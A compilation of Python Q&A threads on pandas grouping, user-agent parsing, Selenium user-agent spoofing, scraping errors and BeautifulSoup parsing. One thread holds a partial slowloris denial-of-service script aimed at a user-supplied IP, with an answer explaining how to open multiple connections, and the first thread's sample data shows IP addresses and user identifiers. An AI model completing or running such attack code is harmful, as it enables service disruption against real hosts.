Add new column to row in Pandas groupby - python

I'm trying to group my data frame by userID, iterate over each user's sessions, and add a new column to each session (a row in the data frame) that is 0 or 1 depending on a condition, then write all of the data (ungrouped) to a new CSV file. But I get this error:
IndexError: index 10243 is out of bounds for axis 0 with size 25
My code is:
# Load the semicolon-separated session export.
csv_input = pd.read_csv('sm_data.csv', ';')
# NOTE(review): nothing below ever appends to this list, so it is still empty
# when it is assigned as a column near the end of the script.
is_zero_session = []
# Visit the sessions one user at a time.
for user_index, user_group in csv_input.groupby('browserData.userID', as_index=False):
# Time of the previous session seen for the current user; None until one has been seen.
prev_in_loop = None
for session_index, session in user_group.iterrows():
# Position 23 is read as a Unix timestamp — presumably the sessionDate column;
# verify the position against the CSV header.
dt = datetime.datetime.fromtimestamp(session[23]).isoformat()
# Parse the ISO text back into a datetime so two sessions can be subtracted.
dt = datetime.datetime.strptime(dt, '%Y-%m-%dT%H:%M:%S')
if prev_in_loop is not None:
# Flag 1 when the seconds component of the gap to the previous session is 0.
if (dt - prev_in_loop).seconds == 0:
# NOTE(review): DataFrame.insert(loc, column, value) adds a whole COLUMN at
# column position `loc`; the row label is passed as `loc` here, which is
# presumably what raises the IndexError quoted above. Appending 0/1 to
# is_zero_session instead looks like the intent — confirm.
csv_input.insert(session_index, 'is_zero_session', 1)
else:
csv_input.insert(session_index, 'is_zero_session', 0)
else:
# First session seen for this user: there is nothing to compare against.
csv_input.insert(session_index, 'is_zero_session', 0)
# Remember this session's time for the next comparison.
prev_in_loop = dt
# Attach the collected flags as a column and write the ungrouped data out.
csv_input['is_zero_session'] = is_zero_session
csv_input.to_csv('sm_data_zero_sessions.csv', sep=';', encoding='utf-8')
My data example:
;_id;browserData.cookieEnabled;browserData.firstSession;browserData.isFirstSession;browserData.languagesCount;browserData.mimeTypes;browserData.navigatorVendor;browserData.platform;browserData.pluginsCount;browserData.prevSession;browserData.productName;browserData.queryParams.0;browserData.queryParams.1;browserData.referrer;browserData.targetDomain;browserData.userAgent;browserData.userID;browserData.webDriver;serverData.noScript;serverData.userAgent;serverData.userCookies;serverData.userIp;serverData.userReferrer;sessionDate;sessionId;is_bot_status
0;5e1c862e0ccf197e0bb0482a;True;1578927662.0;True;4.0;0.0;Google Inc.;Linux aarch64;0.0;1578927662.0;Gecko;utm_source=lime.blocked.site;utm_medium=3666779|0.2765645|20200108;cabinet.lime-zaim.ru;Mozilla/5.0 (Linux; arm_64; Android 9; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 YaBrowser/19.12.1.121.00 Mobile Safari/537.36;41393731-945b-4ec3-89ec-dc3b998eb3a5;False;Mozilla/5.0 (Linux; arm_64; Android 9; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 YaBrowser/19.12.1.121.00 Mobile Safari/537.36;{ };178.34.161.101;https://creditjoy.ru/results/lime?utm_source=lime.blocked.site&utm_medium=3666779|0.2765645|20200108;1578927662;2e0736c8-8fce-4057-a6bd-c8d9146dc595;0
1;5e1c863bdfb6b2b567d6c778;True;1578927675.0;True;4.0;0.0;Google Inc.;Linux armv8l;0.0;1578927675.0;Gecko;creditjoy.ru;Mozilla/5.0 (Linux; Android 9; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36;aed6a2cf-c8d8-4346-bd27-db6b36f422b1;False;Mozilla/5.0 (Linux; Android 9; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36;{ };85.140.4.13;https://creditjoy.ru/go/ffc7726c-f110-4a2d-a271-e9ac40313011;1578927675;744fc0a7-bfbe-47c8-8815-1b3451e4bcda;0
2;5e1c8649458f1a5883d6db29;True;1578927689.0;True;1.0;0.0;Apple Computer, Inc.;iPhone;0.0;1578927689.0;Gecko;utm_source=lime.blocked.site;utm_medium=1222847|0|20200113;cabinet.lime-zaim.ru;Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1;85643f44-8c93-4207-ab57-34d14b2ba651;False;False;Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1;{ };94.25.174.100;https://creditjoy.ru/;1578927689;f1184559-a8a2-45b7-b17e-78f7b68343ed;0
3;5e1c864acdc167e5f5e2e55d;True;1578927690.0;True;2.0;9.0;Google Inc.;Win32;5.0;1578927690.0;Gecko;utm_source=konga.blocked.site;utm_medium=1292099|0.02499068|20200113;cabinet.konga.ru;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 YaBrowser/19.12.3.320 Yowser/2.5 Safari/537.36;dc9bd672-a04d-4c17-aa07-3113645d0f61;False;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 YaBrowser/19.12.3.320 Yowser/2.5 Safari/537.36;{ };37.29.40.57;https://creditjoy.ru/results/konga?utm_source=konga.blocked.site&utm_medium=1292099|0.02499068|20200113;1578927690;b3f645bc-92c6-42db-aba6-2ca1ac40d0c9;0
4;5e1c865469dd649b8fd98d9e;True;1578927675.0;False;4.0;0.0;Google Inc.;Linux armv8l;0.0;1578927675.0;Gecko;creditjoy.ru;Mozilla/5.0 (Linux; Android 9; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36;aed6a2cf-c8d8-4346-bd27-db6b36f422b1;False;Mozilla/5.0 (Linux; Android 9; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36;{ };85.140.4.13;https://creditjoy.ru/go/e241b708-ee3e-4b55-bcba-bc898bbab799;1578927700;1d42d936-1e74-4e75-8528-2e31c18fe39a;0
5;5e1c865fdfb6b2b567d6c779;True;1578927690.0;False;2.0;9.0;Google Inc.;Win32;5.0;1578927690.0;Gecko;creditjoy.ru;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 YaBrowser/19.12.3.320 Yowser/2.5 Safari/537.36;dc9bd672-a04d-4c17-aa07-3113645d0f61;False;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 YaBrowser/19.12.3.320 Yowser/2.5 Safari/537.36;{ };37.29.40.57;https://creditjoy.ru/go/c7e65b52-db79-4240-abb6-27353d58d452;1578927711;7e2774b1-f6ae-4d1f-9f0d-746379af764b;0
6;5e1c86634f2e3db798f6d1bf;True;1578927715.0;True;4.0;0.0;Google Inc.;Linux armv8l;0.0;1578927715.0;Gecko;utm_source=lime.blocked.site;utm_medium=3063107%7C0.6145995%7C20191204;cabinet.lime-zaim.ru;Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.116 Mobile Safari/537.36;5b171e87-212e-4c9f-a7c9-a39ac84808b6;False;Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.116 Mobile Safari/537.36;{ };178.176.165.219;https://creditjoy.ru/results/lime?utm_source=lime.blocked.site&utm_medium=3063107%7C0.6145995%7C20191204;1578927715;c4d61f02-a049-45c7-add8-701ab71d9096;0
7;5e1c8669cdc167e5f5e2e55e;True;1578927721.0;True;4.0;2.0;Win32;1.0;1578927721.0;Gecko;utm_source=konga.blocked.site;utm_medium=807071|0|20200113;cabinet.konga.ru;Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0;c3012df3-7649-48fc-b576-6fe3056a8d64;False;False;Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0;{ };217.175.11.223;https://creditjoy.ru/results/konga?utm_source=konga.blocked.site&utm_medium=807071|0|20200113;1578927721;78b7264f-4756-468c-8699-34c1b029dfb1;0
8;5e1c866e0ccf197e0bb0482b;True;1578927725.0;True;1.0;0.0;Apple Computer, Inc.;iPhone;0.0;1578927725.0;Gecko;utm_source=lime.blocked.sms;Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1;621c9de7-ea86-4703-849c-74a15cdc641b;False;False;Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1;{ };109.197.204.92;https://creditjoy.ru/;1578927726;1e8ca2bf-01fa-4491-9513-f2d8cbaf33f2;0
9;5e1c86735a10b4df2729d1fb;True;1578927731.0;True;4.0;0.0;Google Inc.;Linux armv7l;0.0;1578927731.0;Gecko;utm_source=lime.blocked.site;utm_medium=4095508|0.1009313|20200111;cabinet.lime-zaim.ru;Mozilla/5.0 (Linux; Android 8.0.0; FIG-LX1 Build/HUAWEIFIG-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36;510fd9a0-53dd-44b7-8bea-e1f9c95dd22a;False;Mozilla/5.0 (Linux; Android 8.0.0; FIG-LX1 Build/HUAWEIFIG-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36;{ };213.234.251.141;https://creditjoy.ru/results/lime?utm_source=lime.blocked.site&utm_medium=4095508%7C0.1009313%7C20200111;1578927731;41dd5a71-2254-4235-b046-19a5894fd810;0
10;5e1c868a69dd649b8fd98d9f;True;1578927595.0;False;4.0;4.0;Google Inc.;Win32;3.0;1578927595.0;Gecko;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36;5232fbdb-beb7-48f1-8518-2b64a82e411b;False;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36;{ };213.247.198.140;https://creditjoy.ru/results/konga?utm_source=konga.blocked.site&utm_medium=490763|0.5122826|20191225;1578927754;03fe45d8-fceb-491d-a0d4-24328d14805c;0
I have 16659 rows in my df
I need to group the row data (currently ungrouped) by 'browserData.userID', get all sessions for each group (user), compute the time between consecutive sessions, append 0 or 1 to each session depending on that condition, and save the ungrouped data to a file. I'm new to Pandas; what am I doing wrong?

Related

Python user-agents package: why does the package not parse the string correctly?

I want to parse three additional pieces of information (browser, device and OS) from the AGN column of the sample CSV file below:
_time,AGN,emoloyee
2022-08-30T17:54:18.796+0000,"[Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36]",employeeA
2022-08-30T12:56:35.927+0000,"[Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36]",employeeB
2022-06-06T07:27:31.647+0000,"[Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.27]",employeeC
Here is the code i used:
import pandas as pd
from user_agents import parse
# Remove the surrounding square brackets from every user-agent string.
df1_identifyDevice['AGN']=df1_identifyDevice['AGN'].str.strip('[]')
# Parse each user-agent string in turn; `user_agent` is overwritten on every pass.
for item in df1_identifyDevice['AGN']:
user_agent = parse(item)
print(item)
# NOTE(review): each assignment below stores a single scalar into the whole
# column, so every row receives the values of one parsed user agent
# (presumably the last one, if these lines run after the loop). A per-row
# form such as df1_identifyDevice['AGN'].apply(lambda ua: parse(ua).browser.family)
# looks like the intent — confirm.
df1_identifyDevice['browser'] = user_agent.browser.family
df1_identifyDevice['os'] = user_agent.os.family
df1_identifyDevice['device'] = user_agent.device.family
But the code above does not seem to parse the information correctly:
for 'browser' it returns 'Safari' for every row,
for 'os' it returns 'Mac OS X' for every row,
for 'device' it returns 'Mac' for every row.
Please refer to below running result:
Could you please take a look and tell me what is wrong with the code?

How to make a fingerprint of Chrome 79 using Selenium

I tried this line of code and it didn't work:
option.add_argument("user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36")
The fingerprint shown on selenium is the same as in google chrome. Please help me out! I'd really appreciate it.
You can set any of the supported user agents of Chrome v79 using the execute_cdp_cmd() command as follows:
Code Block:
driver = webdriver.Chrome(service=s, options=options)
print("Default UserAgent is: "+driver.execute_script("return navigator.userAgent;"))

# Chrome 79 user-agent strings, applied one after another in this order:
# 79.0.3945.36, 79.0.3945.130, 79.0.3945.0, 79.0.3945.117, 79.0.3945.88.
chrome_79_user_agents = (
    'Mozilla/5.0 (Linux; Android 10; Generic Android-x86_64 Build/QD1A.190821.014.C2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.36 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36',
)
for ua_string in chrome_79_user_agents:
    # Override the user agent through the DevTools protocol, then read it back
    # from the page to show which value the browser now reports.
    driver.execute_cdp_cmd('Network.setUserAgentOverride', {"userAgent": ua_string})
    print(driver.execute_script("return navigator.userAgent;"))
Console Output:
Default UserAgent is: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.101 Safari/537.36
Mozilla/5.0 (Linux; Android 10; Generic Android-x86_64 Build/QD1A.190821.014.C2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.36 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36

Multi socket connection to server Python

I get this error within python socket. My aim is to create a slow lorris attack but I am having problems with getting multi connections to my router within the one program
I want to get the amount of sockets within a list to call
import socket
import time
import os
import random
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
]
def clear():
os.system("cls")
print("Starting...")
print("press enter to start")
agreement = input("")
port = 445
port_s = str(port)
socket.settimeout(4)
list_of_sockets = []
import socket
servers = [] #add servers here
if agreement == "":
clear()
print("")
print("welcome...")
target = input("ip target>>>")
print("defult port is " + port_s)
print("-" * 10 + " START " + "-" * 10)
print("")
def connect_to():
int_nob = int(200)#num of bots
for x in range(0, int_nob):
print(int(int_nob))
int_nob -= 1
int_nob = socket.connect((target, port))
int_nob.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8"))
client = new Client()
if int_nob == 0:
print(list_of_sockets)
print("resending sockets of " + int_nob)
while True:
connect_to()
else:
print("breaking...")
exit()
error
Traceback (most recent call last):
File "C:\Users\townte23\Desktop\slow lorris,.py", line 78, in <module>
connect_to()
File "C:\Users\townte23\Desktop\slow lorris,.py", line 71, in connect_to
a = socket.connect((target, port))
OSError: [WinError 10056] A connect request was made on an already connected socket
I did cannibalize someone elses code but most of it is mine
https://github.com/gkbrk/slowloris/blob/master/slowloris.py
I did find a similar issue but it was a server issue so I'm not sure how to approach this error
Edit: found the problem and the solution
int_nob = int(200)
for
int_nob = socket.connect(())
int_nob.send(bytes("thing"))
int_nob -= 1
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
...
def connect_to():
...
for x in range(0, int_nob):
...
a = socket.connect((target, port))
...
while True:
connect_to()
You cannot do multiple connects with the same socket but you have to create a new socket for each new connection. Apart from that it is very confusing that you call your socket simply socket since this conflicts in name with the module socket you import.

Urllib3 HTTP Error 502: Bad Gateway

I am trying to scrape zk.fm in order to download music, but it's giving me some trouble. I'm using urllib3 to generate a response, but this always yields a Bad Gateway error. Accessing the website through a browser works perfectly fine.
This is my code (with a random fake user-agent). I'm trying to access "http://zk.fm/mp3/search?keywords=" followed by some keywords which indicate the song name and artist, for example "http://zk.fm/mp3/search?keywords=childish+gambino+heartbeat".
from bs4 import BeautifulSoup
from random import choice
import urllib3
desktop_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0']
def random_headers():
    """Return a headers dict holding one randomly chosen desktop User-Agent."""
    picked_agent = choice(desktop_agents)
    return {'User-Agent': picked_agent}
# Pick one random User-Agent header set for this run.
ua = random_headers()
# Send the chosen headers with every request made through this pool
# (10 is the number of connection pools to keep).
http = urllib3.PoolManager(10, headers=ua)
# The URL is kept on a single line: a plain quoted string cannot span a line break.
response = http.request('GET', "http://zk.fm/mp3/search?keywords=childish+gambino+heartbeat")
# Name the parser explicitly so the parse result does not depend on which
# optional parsers happen to be installed on the machine.
soup = BeautifulSoup(response.data, "html.parser")
Is there a way to work around the 502 Error, or is it out of my control?
You need to enable the persistence of cookies, then access, in order, the site home page followed by the search URL. I suggest (personally) python-requests, but it is up to you. See here for discussion.
I tested this by visiting the search page - error 502. visit home page - 200. visit search - 200. clear cookies and visit search again - 502. So it must be cookies that are the problem.

Web parsing with python beautifulsoup producing inconsistent result

I am trying to parse the table of this site. I am using python beautiful soup to do that. While it's producing correct output in my Ubuntu 14.04 machine, it's producing wrong output in my friend's windows machine. I am pasting the code snippet here:
from bs4 import BeautifulSoup
def buildURL(agi, families):
    """Build the AthaMap gene-analysis search URL.

    Args:
        agi: Space-separated gene identifiers.
        families: Space-separated family names; any "/" is percent-encoded.

    Returns:
        The complete search URL as a string.
    """
    genes = agi.split(" ")
    family_names = families.split(" ")

    # All genes go into one query value, separated by an encoded CRLF.
    # str.split(" ") always yields at least one element, so no emptiness
    # check is needed before joining.
    gene_part = "?agi=" + "%0D%0A".join(genes)
    fixed_part = "&upstream=-500&downstream=50&restriction=0&sortBy1=gen&sortBy2=fac&sortBy3=pos"
    # One "familySelected[<name>]=on" switch per family, brackets pre-encoded.
    family_part = "".join(
        "&familySelected%5B" + name.replace("/", "%2F") + "%5D=on"
        for name in family_names
    )
    return (
        "http://www.athamap.de/search_gene.php"
        + gene_part
        + fixed_part
        + family_part
        + "&formSubmitted=TRUE"
    )
def fetch_html(agi, families):
    """Download the AthaMap result page and return its gene-analysis <div>.

    Args:
        agi: Space-separated gene identifiers, forwarded to buildURL.
        families: Space-separated family names, forwarded to buildURL.

    Returns:
        The <div> whose id is "geneAnalysisDetail" (the last one if the page
        contains several), or "" when the page has no such element.
    """
    url = buildURL(agi, families)
    response = requests.get(url)
    # Pass the decoded text as-is: forcing it through str() can fail on
    # non-ASCII pages under Python 2 and is a no-op on Python 3.
    soup = BeautifulSoup(response.text, "lxml")
    # Filter on the id directly rather than probing every <div> inside a
    # catch-all try/except, which would also hide unrelated errors.
    matches = soup.find_all("div", id="geneAnalysisDetail")
    return matches[-1] if matches else ""
# Turn the selected result element into a list of rows, each row being a list
# of cell strings.
def parse(seldiv):
soup = seldiv
rows= soup.find_all('tr')
# Column titles of the result table; they are only printed, not attached to
# the returned rows.
attributes =["Gene", "Factor", "Family", "Position", "Relative orientation", "Relative Distance", "Max score", "Threshold Score", "Score"]
# Python 2 print statement.
print attributes
save_rows = []
# Start at index 2, i.e. skip the first two <tr> elements (presumably header
# rows — confirm against the page markup).
for i in range(2, len(rows)):
cols = rows[i].find_all('td')
lst = []
# Cells 0, 1 and 3 take their text from the first child of the cell's second
# child; every other cell takes it from the cell's first child.
for j,col in enumerate(cols):
if j==0:
# NOTE(review): the pattern is an empty string, so this substitution returns
# the text unchanged; the intended pattern may have been lost — confirm.
# `re` is also not imported in the visible snippet.
lst.append(re.sub('', '',str(col.contents[1].contents[0])))
elif j==1:
lst.append(str(col.contents[1].contents[0]))
elif j==2:
lst.append(str(col.contents[0]))
elif j==3:
lst.append(str(col.contents[1].contents[0]))
else:
lst.append(str(col.contents[0]))
save_rows.append(lst)
return save_rows
Any idea what could go wrong here? I have tried with and without lxml.
Thanks in advance.
You can parse the table this way, and it should work well on both machines. The buildURL function should be left unchanged.
import requests
from bs4 import BeautifulSoup
def fetch_html(url):
    """Fetch *url* and return the <div> with id "geneAnalysisDetail" (None if absent)."""
    page = requests.get(url)
    document = BeautifulSoup(page.text, "lxml")
    return document.find("div", attrs={"id": "geneAnalysisDetail"})
def parse(url):
    """Fetch the AthaMap result page at *url* and return its table rows.

    Args:
        url: Full search URL, e.g. as produced by buildURL.

    Returns:
        A list with one entry per data row; each entry is the list of that
        row's cell texts with surrounding whitespace removed. The list is
        empty when the page contains no result section.
    """
    seldiv = fetch_html(url)
    if seldiv is None:
        # No result <div> on the page (bad query, error page): nothing to parse.
        return []

    rows = seldiv.find_all("tr")
    save_rows = []
    # The first two <tr> elements are skipped (presumably header rows).
    for row in rows[2:]:
        # strip() removes spaces and newlines in any order; stripping " " and
        # then "\n" separately leaves whitespace behind when they interleave.
        save_rows.append([cell.get_text().strip() for cell in row.find_all("td")])
    return save_rows
# Example query: six genes, three families, default search window.
url = (
    "http://www.athamap.de/search_gene.php"
    "?agi=At1g76540%0D%0AAt3g12280%0D%0AAt4g28980%0D%0AAt4g37630%0D%0AAt5g11300%0D%0AAt5g27620%0D%0A"
    "&upstream=-500&downstream=50&restriction=0"
    "&sortBy1=gen&sortBy2=fac&sortBy3=pos"
    "&familySelected[ARF]=on&familySelected[CAMTA]=on&familySelected[GARP%2FARR-B]=on"
    "&formSubmitted=TRUE"
)
save_rows = parse(url)
# Print each parsed table row on its own line.
for row in save_rows:
    print(row)
One possibility is that you didn't set a user agent for the requests. Different user agents sometimes get different results, especially from unusual websites. Here is a list of common user agents; just choose one. It doesn't have to match your own machine.
USER_AGENTS = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
